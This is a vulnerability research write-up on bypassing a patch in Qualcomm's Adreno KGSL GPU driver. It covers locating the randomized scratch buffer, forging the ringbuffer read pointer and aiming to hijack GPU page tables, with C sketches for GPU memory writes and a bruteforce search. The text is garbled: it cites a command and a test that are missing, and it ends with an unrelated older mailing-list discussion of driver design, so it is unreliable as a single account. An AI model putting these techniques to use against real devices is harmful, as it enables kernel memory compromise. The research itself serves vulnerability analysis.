What is kgsl
The patch selects a random global GPU address for the "scratch" buffer. But here we're talking about a GPU virtual address, not a kernel virtual address. That seems unusual: why would a GPU address need to be randomized? It was relatively straightforward to confirm that this commit was one of the security patches for the CVE, which are linked in Qualcomm's advisory.
A related patch was also included for this CVE, with a commit message that reads: "Execute user profiling in an indirect buffer. This ensures that addresses and values specified directly from the user don't end up in the ringbuffer." And so the question becomes: why exactly is it important that user content doesn't end up on the ringbuffer, and is this patch really sufficient to prevent that?
And what happens if we can recover the base address of the scratch mapping? Both at least superficially looked to be possible, so this research project was off to a great start. Before we go any further, let's take a step back and describe some of the basic components involved here: GPU, ringbuffer, scratch mapping, and so on. Adreno Introduction.
These libraries implement a standard API (such as OpenGL ES or Vulkan) for programming common GPU accelerated operations, such as texture mapping and running shaders. At a low level, however, this functionality is implemented by interacting with the GPU device driver running in kernel space. The permissions on the device file are set by ueventd such that any application can open it. The Adreno "KGSL" kernel device driver is then primarily invoked through a number of different ioctl calls, e.g. to allocate shared memory, create a GPU context, or submit GPU commands.
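As a quick illustration, the device node can be inspected from a shell. The name /dev/kgsl-3d0 is an assumption here (it is the usual Adreno 3D device node); on a machine without an Adreno GPU the lookup simply fails:

```shell
# Show the kgsl device node and its permissions, if present.
# /dev/kgsl-3d0 is the usual Adreno 3D device node name (an assumption);
# on a device without Adreno this falls through to the echo.
ls -l /dev/kgsl-3d0 2>/dev/null || echo "kgsl device not present on this machine"
```

On an Adreno-based Android device, the listing shows the permissive mode bits set by ueventd, which is what lets any application context open the device and start issuing ioctl calls.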
GPU Shared Mappings. For the most part, applications use shared mappings to load vertices, fragments, and shaders into the GPU and to receive computed results. That means certain physical memory pages are shared between a userland application and the GPU hardware.
The kernel driver will prepare a region of physical memory, and then map this memory into the GPU's address space for a particular GPU context, explained below. Finally, the application will map the shared memory into the userland address space by using an identifier returned from the allocation ioctl. At this point, there are two distinct views on the same pages of physical memory.
The first view is from the userland application, which uses a virtual address to access the memory that is mapped into its address space. The second view is from the GPU itself, which accesses the memory through its own page tables using a GPU virtual address. This is similar to the address translation performed on the CPU, but with a completely different address space, i.e. the GPU virtual address of a page is unrelated to its userland virtual address. Each userland process has its own GPU context, meaning that while a certain application is running operations on the GPU, the GPU will only be able to access mappings that it shares with that process.
This is needed so that one application can't ask the GPU to read the shared mappings from another application. However certain mappings are used by all GPU contexts, and so can be present in every set of page tables.
They are called global shared mappings, and are used for a variety of system and debugging functions between the GPU and the KGSL kernel driver.
While they are never mapped directly into a userland application's address space, on a rooted Android device we can dump the global mappings and their GPU virtual addresses using the following command: And suddenly our scratch buffer has appeared! To the left we see the GPU virtual addresses of each global mapping, then a size, and then the name of the allocation.
By rebooting the device several times and checking the layout, we can see that the scratch buffer is indeed randomized. The same test reveals that the scratch buffer is the only global mapping that is randomized; all other global mappings have a fixed GPU address in the range [0xFC, 0xFD]. So we now know that the scratch buffer is correctly randomized (at least to some extent), and that it is a global shared mapping present in every GPU context.
But what exactly is the scratch buffer used for? The Scratch Buffer. Diving into the driver code, we can clearly see the scratch buffer being allocated in the driver's probe routines, meaning that the scratch buffer will be allocated when the device is first initialized. We also find this useful comment: "This allows for some 'shared' data between the CPU and GPU. For example, it will be used by the GPU to write each ringbuffer's current read pointer." The GPU address of a preemption restore buffer is dumped to the scratch memory, which appears to be used if a higher priority GPU command interrupts a lower priority command.
The read pointer (RPTR) of the ringbuffer (RB) is read from scratch memory and used when calculating the amount of free space in the ringbuffer. Here we can start to connect the dots. Firstly, we know that the patch for the CVE included changes to both the scratch buffer and the ringbuffer handling code -- that suggests we should focus on the second use case above. Ringbuffer Basics. To understand what an invalid RPTR value might mean for a ringbuffer allocation, we first need to describe the ringbuffer itself.
The kernel driver will write commands into the ringbuffer, and the GPU will read commands from the ringbuffer. This occurs in a similar fashion to classical circular buffers.
At a low level, the ringbuffer is a global shared mapping with a fixed size. We can see the RPTR value being read at [1], and that it ultimately comes from a read of the scratch global shared mapping at [5]. The first comparison is for the case where the scratch RPTR is less than or equal to the WPTR, meaning that there may be free space toward the end of the ringbuffer or at the beginning of the ringbuffer. So what happens if the scratch RPTR value is controlled by an attacker?
In that case, the attacker could make either one of these conditions succeed, even if there isn't actually space in the ringbuffer for the requested allocation size. For example, we can make the condition at [3] succeed when it normally wouldn't by artificially increasing the value of the scratch RPTR, which at [4] results in returning a portion of the ringbuffer that overlaps the correct RPTR location. That means an attacker's incoming GPU commands could overwrite ringbuffer commands that the GPU hasn't yet processed!
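The free-space logic and the effect of a forged RPTR can be sketched with a simplified model. This is not the actual driver code: the ringbuffer size and function name are stand-ins, and the rptr parameter models the value read from the (GPU-writable) scratch page at [1]/[5].

```c
#include <assert.h>
#include <stdint.h>

#define RB_DWORDS 1024u /* hypothetical ringbuffer size, in 32-bit words */

/* Simplified model of the driver's ringbuffer allocation check.
 * rptr stands in for the value read from the scratch page ([1]/[5]),
 * wptr is the kernel's write pointer. Returns the write offset, or -1
 * if the ring is considered full. */
static int rb_allocate(uint32_t rptr, uint32_t wptr, uint32_t dwords) {
    if (rptr <= wptr) {
        /* Free space may be toward the end of the buffer... */
        if (wptr + dwords < RB_DWORDS)
            return (int)wptr;
        /* ...or wrap around to the beginning. */
        if (dwords < rptr)
            return 0;
    } else if (wptr + dwords < rptr) { /* comparison at [3] */
        return (int)wptr;              /* return at [4] */
    }
    return -1; /* no room */
}
```

With an honest RPTR just ahead of WPTR, the ring is full and allocation fails; with a forged, inflated RPTR, the same request is granted an offset that overlaps commands the GPU hasn't consumed yet.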
That sounds like it could be very useful! But how can we overwrite the scratch RPTR value? We know that the scratch buffer is mapped into every GPU context, including any created by a malicious attacker, so perhaps we can write to it using the GPU itself. To achieve this, there are two fundamental steps.
Firstly, we need to confirm that the mapping is writable by user-supplied GPU commands. Secondly, we need a way to recover the base GPU address of the scratch mapping. This latter step is necessary due to the recent addition of GPU address randomization for the scratch mapping. So are all global shared mappings writable by the GPU? It turns out that not every global shared mapping can be written to by user-supplied GPU commands, but the scratch buffer can be.
We can confirm this by using the sysfs debugging method above to find the randomized base of the scratch mapping, and then writing a short sequence of GPU commands that writes a value to the scratch mapping. These operations aren't documented, however, so their behavior has to be inferred by reading the driver code and through manual testing. It's also possible to confirm that the scratch buffer is writable by looking at how the page tables for the global shared mapping are set up in the kernel driver code.
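Such a short command sequence can be modeled as follows. The packet encoding mirrors the PM4 type-7 format and the CP_MEM_WRITE opcode found in the public msm/kgsl driver sources, but both should be treated as assumptions here rather than a verified command stream:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Odd-parity helper used in the PM4 type-7 header encoding
 * (mirrors the PM4_PARITY macro in the public kgsl driver sources). */
static uint32_t pm4_parity(uint32_t val) {
    return (0x9669u >> (0xF & (val ^ (val >> 4) ^ (val >> 8) ^ (val >> 12)))) & 1;
}

/* Build a PM4 type-7 packet header for `opcode` with `count` payload dwords. */
static uint32_t pkt7(uint32_t opcode, uint32_t count) {
    return 0x70000000u | (count & 0x3FFF) | (pm4_parity(count) << 15) |
           ((opcode & 0x7F) << 16) | (pm4_parity(opcode) << 23);
}

#define CP_MEM_WRITE 0x3D /* assumed opcode, per public driver headers */

/* Emit a command asking the GPU to write `value` to the 64-bit GPU
 * address `gpuaddr` -- e.g. the RPTR slot in the scratch page.
 * Returns the number of dwords written into `cmds`. */
static size_t emit_mem_write(uint32_t *cmds, uint64_t gpuaddr, uint32_t value) {
    size_t n = 0;
    cmds[n++] = pkt7(CP_MEM_WRITE, 3);
    cmds[n++] = (uint32_t)gpuaddr;         /* address low */
    cmds[n++] = (uint32_t)(gpuaddr >> 32); /* address high */
    cmds[n++] = value;                     /* data */
    return n;
}
```

On the real device, a buffer built this way would be submitted through the command-submission ioctl, and success is observed by reading the scratch page back.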
But if the scratch buffer's base address is randomized, how do we know where to write to? There were two approaches to recovering the base address of the scratch buffer. The first approach is to simply take the GPU command we used above to confirm that the scratch buffer was writable, and turn it into a bruteforce attack.
Since we know that global shared mappings live in a fixed range, and we know that only the scratch buffer is randomized, we have a very small search space to explore. Once the other static global shared mapping locations are removed from consideration, only a small number of possible locations for the scratch page remain.
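The bruteforce loop itself is straightforward. In this sketch the probe callback stands in for submitting a GPU command that writes a magic value to the candidate address and checking whether it landed; the address range used in the test is a hypothetical placeholder:

```c
#include <assert.h>
#include <stdint.h>

#define GPU_PAGE_SIZE 0x1000ull

/* Probe callback: on the real device this would submit GPU commands
 * targeting `gpuaddr` and report whether the write landed. */
typedef int (*probe_fn)(uint64_t gpuaddr, void *ctx);

/* Walk every page-aligned candidate in the global-mapping region,
 * probing each one until the scratch page is found. */
static uint64_t find_scratch(uint64_t start, uint64_t end,
                             probe_fn probe, void *ctx) {
    for (uint64_t addr = start; addr < end; addr += GPU_PAGE_SIZE) {
        if (probe(addr, ctx))
            return addr; /* the write landed: scratch page found */
    }
    return 0;
}

/* Stand-in probe for running the loop off-device: "finds" the page at
 * the address stored in ctx. */
static int probe_sim(uint64_t gpuaddr, void *ctx) {
    return gpuaddr == *(uint64_t *)ctx;
}
```

In practice the candidates that correspond to known static global mappings can be skipped as well, shrinking the search further.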
On average, it took around 7 minutes to find the scratch page. The second approach was even better: as mentioned above, the scratch buffer is also used for preemption. Overwriting the Ringbuffer. Now that we know we can reliably control the scratch RPTR value, we can turn our attention to corrupting the contents of the ringbuffer.
What exactly is contained in the ringbuffer, and what does overwriting it buy us? There are actually four different ringbuffers, each used for a different GPU priority level, but we only need one for this attack. We choose the ringbuffer that is used the least on a modern Android device, in order to avoid any noise from other applications using the GPU: ringbuffer 0, which at the time wasn't used at all by Android.
In practice, however, user-supplied GPU commands are never placed directly onto the ringbuffer. This is for two reasons: (1) space in the ringbuffer is limited, and user-supplied GPU commands can be very large, and (2) the ringbuffer is readable by all GPU contexts, and we want to ensure that one process can't read commands from a different process.
Instead, a layer of indirection is used, and user-supplied GPU commands run after an "indirect branch" from the ringbuffer. Conceptually, system-level commands are executed straight from the ringbuffer, while user-level commands are run after an indirect branch into GPU shared memory.
Once the user commands finish, control flow returns to the next ringbuffer operation. The indirect branch operation takes two parameters: the GPU address of the branch target (i.e. the user's command buffer in GPU shared memory) and its size. Aside from the indirect branch operation, the ringbuffer contains a number of other GPU command setup and teardown operations, a bit like the prologue and epilogue of a compiled function.
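This control flow can be modeled with a toy interpreter. All opcodes and structures here are invented purely to illustrate the ring-to-indirect-buffer-and-back execution order:

```c
#include <assert.h>
#include <stddef.h>

/* Toy model of ringbuffer control flow: commands run straight from the
 * ring until an indirect-branch entry, which executes a user command
 * buffer (identified by target and size) and then falls through to the
 * next ring entry. The encodings are made up for this sketch. */
enum { OP_EXEC = 1, OP_IB = 2 };

typedef struct {
    int op;            /* OP_EXEC or OP_IB */
    const int *target; /* user command buffer (OP_IB only) */
    size_t size;       /* number of user commands (OP_IB only) */
    int val;           /* system-level command payload (OP_EXEC only) */
} cmd;

/* Run `n` ring entries, appending each executed value to `out`;
 * returns the number of values executed. */
static size_t run_ring(const cmd *ring, size_t n, int *out) {
    size_t executed = 0;
    for (size_t i = 0; i < n; i++) {
        if (ring[i].op == OP_EXEC) {
            out[executed++] = ring[i].val;           /* system-level command */
        } else if (ring[i].op == OP_IB) {
            for (size_t j = 0; j < ring[i].size; j++)
                out[executed++] = ring[i].target[j]; /* user commands */
            /* control returns to the next ring operation */
        }
    }
    return executed;
}
```

The test below checks the ordering the text describes: prologue commands, then the user buffer via the indirect branch, then the epilogue.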
This includes the preemption setup mentioned earlier, GPU context switches, hooks for performance monitoring, errata fixups, identifiers, and protected mode operations. Given that we have some sort of ringbuffer corruption primitive, protected mode operations certainly sound like a potential target area, so let's explore this further.
Protected Mode. By default, the GPU runs in protected mode. This means that certain global shared mappings and certain GPU register ranges cannot be accessed (read or written). Commands running directly from the ringbuffer, however, are allowed to disable protected mode, and it turns out that this is critically important to the security model of the GPU architecture. Operations related to preemption, errata fixups, performance counters, and GPU context switches can all potentially run with protected mode disabled.
This last operation, GPU context switches, sounds particularly interesting. As a reminder, the GPU context switch occurs when two different processes are using the same ringbuffer. Since the GPU commands from one process aren't allowed to operate on the shared memory belonging to another process, the context switch is needed to switch out the page tables that the GPU has loaded.
What if we could make the GPU switch to an attacker controlled page table? Not only would our GPU commands be able to read and write shared mappings from other processes, we would be able to read and write to any physical address in memory, including kernel memory! This is an intriguing proposition, and looking at how the kernel driver sets up the context switch operations in the ringbuffer, it looks alluringly possible. It's possible that this design was chosen for performance considerations, as it means that the GPU can perform a context switch without having to interrupt the kernel and wait for the IOMMU to be reconfigured -- it can simply reconfigure itself.
During the context switch sequence, the GPU itself updates the SMMU's TTBR0 register, which holds the base address of the page tables used for GPU address translation. That means if we can point TTBR0 to a set of malicious page tables, then we can translate any GPU address to any physical address of our choosing. And suddenly, we have a clear idea of how the original attack in the CVE worked. Recall that aside from randomizing the scratch buffer location, the patch for the CVE also "ensures that addresses and values specified directly from the user don't end up in the ringbuffer". We can now study Guang Gong's whitepaper and confirm that his attack managed to use the RPTR corruption technique (at the time using the static address of the scratch buffer) to smuggle operations into the ringbuffer via the arguments to performance profiling commands, which would then be executed due to clever alignment with the "true" RPTR value on the GPU.
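Why controlling TTBR0 is so powerful can be shown with a toy translation model. This is a deliberately simplified single-level walk, not the real multi-level ARM SMMU page-table format: the point is only that whoever supplies the table base controls every virtual-to-physical mapping.

```c
#include <assert.h>
#include <stdint.h>

/* Toy model: TTBR0 points at the page table, so an attacker-built table
 * can translate any chosen virtual address to any chosen physical
 * address. Single-level, 4KiB pages, 16 entries -- all simplifications. */
#define TOY_PAGE_SHIFT 12
#define TOY_NUM_ENTRIES 16

typedef struct {
    uint64_t entries[TOY_NUM_ENTRIES]; /* each entry: a physical page number */
} toy_pagetable;

/* Translate: index the table by the VA's page number, then re-attach
 * the page offset to the physical page number found there. */
static uint64_t toy_translate(const toy_pagetable *ttbr0, uint64_t va) {
    uint64_t idx = (va >> TOY_PAGE_SHIFT) % TOY_NUM_ENTRIES;
    return (ttbr0->entries[idx] << TOY_PAGE_SHIFT) |
           (va & ((1u << TOY_PAGE_SHIFT) - 1));
}
```

An attacker who fills in the entries decides where every GPU access really lands, including pages belonging to the kernel.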
Recovering the Attack. Since we have already bypassed the first part of the patch for the CVE (randomizing the scratch buffer base), to recover the attack we need to bypass the second part as well. In essence, the second part of the patch prevented attacker-controlled commands from being written to the ringbuffer, particularly by the profiling subsystem.
The obvious path to bypassing this fix would be to find a different way to smuggle attacker-controlled commands. While there were some exciting looking avenues (such as using the user-supplied GPU address as a command opcode), I decided to pursue a different approach. The 2D core is also a platform device with shared memory and an MMU.
While the general interface is similar to the 3D core, the 2D GPU has its own separate pipeline and interrupt. PMEM is not ideal because the contiguous memory it uses needs to be carved out of bootmem at init time and is lost to the general system pool, so the driver was switched to use paged memory allocated via vmalloc and mapped into the GPU MMU. As a result, a handful of additional ioctls were put into the driver to support allocating and managing the memory.
Then, when support came along for the 2D core, it turned out that most of the support code was identical to that for the 3D GPU, with only a few differences in how the command streams and interrupts were processed. The 2D and 3D code were merged together to form the driver that I linked above. The ioctl calls remained the same, and a "device" member was added to each structure to determine which core the call was destined for. It has been argued that having the 2D and the 3D together is silly since they are separate platform devices and they should be treated as such - the proposal is to have multiple device nodes, one for each device.
I think that if we did this design we would also need an additional device to allocate memory buffers, which would make it easier for us to share memory between cores (X11 in particular does a lot of simultaneous 2D and 3D). I also think that the memory allocator should be transitioned to a standard design (probably TTM).
I presume that one of the conditions of upstreaming would be to rename everything to something a little bit more descriptive and a little bit less cryptic.